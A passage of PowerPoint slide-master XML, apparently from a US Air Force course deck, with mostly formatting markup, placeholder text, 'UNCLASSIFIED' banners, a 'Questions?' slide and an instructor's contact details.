            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Instructor’s phone:	(702) 652-2215</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-320040" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="125000"/>
              <a:buFont typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="3430588" algn="l"/>
                <a:tab pos="8064500" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Instructor’s e-mail:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>patrick.vinge.2@us.af.mil</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2082801" y="186726"/>
            <a:ext cx="8026400" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="90488" tIns="44450" rIns="90488" bIns="44450" numCol="1" anchor="ctr" anchorCtr="1" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2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2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5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5pPr>
            <a:lvl6pPr marL="4572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6pPr>
            <a:lvl7pPr marL="9144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7pPr>
            <a:lvl8pPr marL="13716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8pPr>
            <a:lvl9pPr marL="18288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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Questions?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="36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3333FF">
                <a:gamma/>
                <a:shade val="46275"/>
                <a:invGamma/>
              </a:srgbClr>
            </a:gs>
            <a:gs pos="50000">
              <a:srgbClr val="3333FF"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="3333FF">
                <a:gamma/>
                <a:shade val="46275"/>
                <a:invGamma/>
              </a:srgbClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="1"/>
        </a:gradFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2129370" y="1263933"/>
            <a:ext cx="9859433" cy="91794"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="98000">
                <a:schemeClr val="bg2">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:srgbClr val="AEAEAE"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gradFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effec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eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400" b="1" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFA27C"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400" b="1" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFA27C"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400" b="1" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFA27C"/>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rgbClr val="FFA27C"/>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rgbClr val="FFA27C"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" b="1" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFA27C"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" b="1" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFA27C"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" b="1" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFA27C"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" b="1" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFA27C"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34"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A27C"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183298" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="black">
          <a:xfrm>
            <a:off x="508000" y="1595441"/>
            <a:ext cx="11176000" cy="4795837"/>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dirty="0" smtClean="0"/>
              <a:t>Click to edit master text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="649224" lvl="1" indent="-320040" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="125000"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="8523524" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="978408" lvl="2" indent="-320040" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="125000"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="8523524" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1316736" lvl="3" indent="-320040" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="125000"/>
              <a:buFont typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="8523524" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1645920" lvl="4" indent="-320040" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="125000"/>
              <a:buFont typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="8523524" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fifth level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183300" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="3"/>
            <a:ext cx="12192000" cy="366767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90488" tIns="44450" rIns="90488" bIns="44450" anchor="ctr" anchorCtr="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>UNCLASSIFIED</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183301" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6494466"/>
            <a:ext cx="12192000" cy="366767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90488" tIns="44450" rIns="90488" bIns="44450" anchor="ctr" anchorCtr="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>UNCLASSIFIED</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183302" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="black">
          <a:xfrm>
            <a:off x="2130427" y="200025"/>
            <a:ext cx="7912608" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="90488" tIns="44450" rIns="90488" bIns="44450" numCol="1" anchor="ctr" anchorCtr="1" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit master</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="183303" name="Group 7"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="299569" y="98428"/>
            <a:ext cx="1529175" cy="1393825"/>
            <a:chOff x="94" y="71"/>
            <a:chExt cx="912" cy="878"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="183304" name="Picture 8" descr="template_ws_patch"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr userDrawn="1"/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="242" y="71"/>
              <a:ext cx="617" cy="748"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="183305" name="AutoShape 9" descr="Large checker board"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="94" y="709"/>
              <a:ext cx="912" cy="240"/>
            </a:xfrm>
            <a:prstGeom prst="ellipseRibbon2">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 56019"/>
                <a:gd name="adj3" fmla="val 25000"/>
              </a:avLst>
            </a:prstGeom>
            <a:pattFill prst="lgCheck">
              <a:fgClr>
                <a:schemeClr val="tx2"/>
              </a:fgClr>
              <a:bgClr>
                <a:schemeClr val="bg2"/>
              </a:bgClr>
            </a:pattFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183306" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="black">
          <a:xfrm>
            <a:off x="11522502" y="6541292"/>
            <a:ext cx="415498" cy="313932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr" anchorCtr="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:fld id="{DA903C6E-477B-42BE-B60F-40CFBB4EFC57}" type="slidenum">
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="00DFCA"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:pPr algn="r">
                <a:lnSpc>
                  <a:spcPct val="80000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="30000"/>
                </a:spcBef>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00DFCA"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMap bg1="dk2" tx1="lt1" bg2="dk1" tx2="lt2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483658" r:id="rId1"/>
    <p:sldLayoutId id="2147483659" r:id="rId2"/>
    <p:sldLayoutId id="2147483661" r:id="rId3"/>
    <p:sldLayoutId id="2147483663" r:id="rId4"/>
    <p:sldLayoutId id="2147483664" r:id="rId5"/>
    <p:sldLayoutId id="2147483673" r:id="rId6"/>
  </p:sldLayoutIdLst>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:lnSpc>
          <a:spcPts val="3700"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3600" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2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2pPr>
      <a:lvl3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3pPr>
      <a:lvl4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4pPr>
      <a:lvl5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5pPr>
      <a:lvl6pPr marL="4572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6pPr>
      <a:lvl7pPr marL="9144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7pPr>
      <a:lvl8pPr marL="13716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8pPr>
      <a:lvl9pPr marL="18288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9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="320040" indent="-320040" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="300"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="300"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buSzPct val="125000"/>
        <a:buChar char="–"/>
        <a:tabLst>
          <a:tab pos="8064500" algn="l"/>
        </a:tabLst>
        <a:defRPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="530352"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dirty="0" smtClean="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="713232"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dirty="0" smtClean="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="886968"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dirty="0" smtClean="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1033272"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dirty="0" smtClean="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl5pPr>
